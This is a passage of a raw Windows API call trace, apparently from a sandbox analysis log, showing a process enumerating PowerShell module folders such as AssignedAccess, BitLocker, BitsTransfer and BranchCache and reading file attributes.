lpOldMode=0x1b83e3c8) returned 1 [0263.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0263.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x42, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0263.149] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7990 [0263.149] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.149] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25fe0370, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf667de04, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x25fe0370, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0263.149] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25fe0370, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x3eec5ef, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x3eec5ef, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x3499, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0263.150] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0263.150] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.150] FindClose (in: hFindFile=0x1acc7990 | out: hFindFile=0x1acc7990) returned 1 [0263.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.150] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0263.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0263.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x56, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0263.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0263.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x56, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0263.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23da378 | out: lpFileInformation=0x23da378*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25fe0370, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb1ca4b3, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x25fe0370, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f6)) returned 1 [0263.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0263.153] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7b10 [0263.154] FindNextFileW (in: hFindFile=0x1acc7b10, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.154] FindNextFileW (in: hFindFile=0x1acc7b10, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2bffca1, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0263.154] FindNextFileW (in: hFindFile=0x1acc7b10, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf667de04, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x31ac7f1c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0263.155] FindNextFileW (in: hFindFile=0x1acc7b10, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf7459824, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x49b98, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0263.155] FindNextFileW (in: hFindFile=0x1acc7b10, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0263.155] FindNextFileW (in: hFindFile=0x1acc7b10, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf90370be, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0263.155] FindNextFileW (in: hFindFile=0x1acc7b10, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf90370be, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0263.155] FindClose (in: hFindFile=0x1acc7b10 | out: hFindFile=0x1acc7b10) returned 1 [0263.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.156] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20 [0263.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0263.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0263.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0263.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0263.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.159] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23dac48 | out: lpFileInformation=0x23dac48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb23cad3, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x31ac7f1c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6ea)) returned 1 [0263.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0263.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0263.160] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc70f0 [0263.160] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.160] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x359c88a6, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1c32, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0263.160] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0263.160] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x359c88a6, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0263.160] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x359c88a6, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0263.160] FindClose (in: hFindFile=0x1acc70f0 | out: hFindFile=0x1acc70f0) returned 1 [0263.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.161] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0263.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0263.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0263.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0263.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0263.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23db3d8 | out: lpFileInformation=0x23db3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb2d54f1, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x644)) returned 1 [0263.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0263.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x3f, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0263.163] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc75d0 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1401f1d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x1401f1d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1401f1d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x1401f1d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, 